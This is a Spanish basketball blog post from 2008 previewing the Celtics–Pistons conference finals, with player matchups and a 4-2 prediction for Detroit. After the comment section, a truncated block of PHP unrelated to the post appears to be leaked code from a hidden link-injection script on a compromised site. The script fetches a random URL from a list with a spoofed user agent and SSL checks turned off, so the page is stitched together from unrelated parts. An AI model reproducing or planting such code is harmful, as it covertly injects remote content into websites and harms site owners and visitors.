Trayectorias simétricas pero en sentidos contrarios

20 de May de 2008 por TheDeerHunter

Antecedentes regular: 2-1 para Boston (2 partidos en Boston, una victoria visitante para cada uno)
Factor cancha: Boston

Tras todas las vueltas que se han llegado a dar en lo que va de temporada y de playoffs, finalmente los dos equipos llegan donde se suponía que iban a estar a estas alturas desde el principio. Eran sin duda, los dos grandes favoritos del este y al final se ha confirmado su favoritismo aunque de maneras bastante distintas a lo que se esperaba. Boston ha sufrido hasta el último momento en sus dos series y ha trasmitido importantes signos de desgaste. Detroit sufrió en la primera y se ha visto afectado por las lesiones, pero ha impuesto su categoría con cierta suficiencia. Se supone que son las dos mejores defensas en estático que hay en la competición y teóricamente se prevee un enfrentamiento muy físico y controlado, típico del este.

Ya cuando las cosas marchaban de forma impecable para Boston, con su rutilante trío de futuros Hall of Famers, el impacto súbito de Rajon Rondo, la extraordinaria defensa implementada por Doc Rivers, su increíble balance victorias/derrotas y los interesantes refuerzos de última hora, algunas voces pronosticaban que los Pistons acabarían con su sueño. En estos momentos la trayectoria de ambos equipos es simétrica. Los Pistons han subido sus prestaciones un nivel y los Celtics parecen estar perdiendo sus virtudes por momentos. Ahora mismo existen dos dudas fundamentales que pueden marcar la eliminatoria:

La primera es la recuperación de Billups de su lesión. Se esperaba su regreso ya para los partidos de Orlando y se abortó por precaución y porque su equipo estuvo fantástico sin él. Según cómo vuelva, un base joven y físico como Rajon Rondo podría ponerle en ciertos compromisos. En condiciones normales Billups es infinitamente mejor que Rondo y ahora mismo él tampoco ha estado para tirar cohetes. En esta posición hay una importante ventaja para Pistons, mientras no se demuestre lo contrario.

La segunda es la recuperación de Ray Allen que, si bien no ha estado lesionado, casi hubiera sido mejor para Boston que sí lo estuviera. Poco queda en estos momentos del letal tirador que conocíamos. Está con la confianza por los suelos y quemado como la pipa de un indio. Por contra Hamilton está en su mejor momento de la temporada y puede hacer una sangría si Allen no le desgasta en defensa. Esta puede ser la clave más importante de la eliminatoria, porque la ventaja es muy grande para Pistons.

Para completar el juego exterior veremos cómo Prince puede aplicarse sobre Paul Pierce. El céltico está siendo determinante en casa pero irregular fuera de ella. Si por una de esas Prince logra minimizarlo los Celtics pueden pasarlo verdaderamente mal. El resultado de la eliminatoria a favor de Celtics depende muy mucho cómo resuelva Pierce esta situación. Ventaja a favor de Celtics.

Dentro, a los hombres altos de Detroit ya les ha tocado bailar con la más fea y no creemos que exista un desequilibrio significativo entre un juego interior y otro. Los centers titulares no deben ser trascendentes y por características son muy parecidos, quizá la experiencia de McDyess le aporte una mínima ventaja sobre Perkins. Wallace y Garnett son dos ala-pivots relativamente similares, con cierta ventaja para el mejor defensor de la temporada, pero que actualmente ambos aportan más defensiva que ofensivamente. Pensamos que puede haber un empate entre los interiores de Detroit y Celtics.

En el banquillo, ambos equipos cuentan con jugadores de intendencia, que no cuentan con peso específico significativo. En teoría el de Celtics es más profundo, pero no ha sido así estas eliminatorias sino todo lo contrario. Maxiell y Stuckey han aportado cosas muy importantes puntualmente hablando incluso sustituyendo a los propios titulares de Detroit (palabras mayores) Posey, House y P.J. Brown han sido útiles, pero más en defensa que en cualquier otro aspecto. Empate.

Finalmente, por experiencia y por desgaste, Detroit también cuenta con ventaja en estos momentos. Se esperaba un camino de rosas en el este, pero no lo ha sido así en absoluto.

Pronóstico: 2-4 a favor de Detroit.

Comenta

Un comentario a esta entrada

  1. planetbasket.net dice:
    #1

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>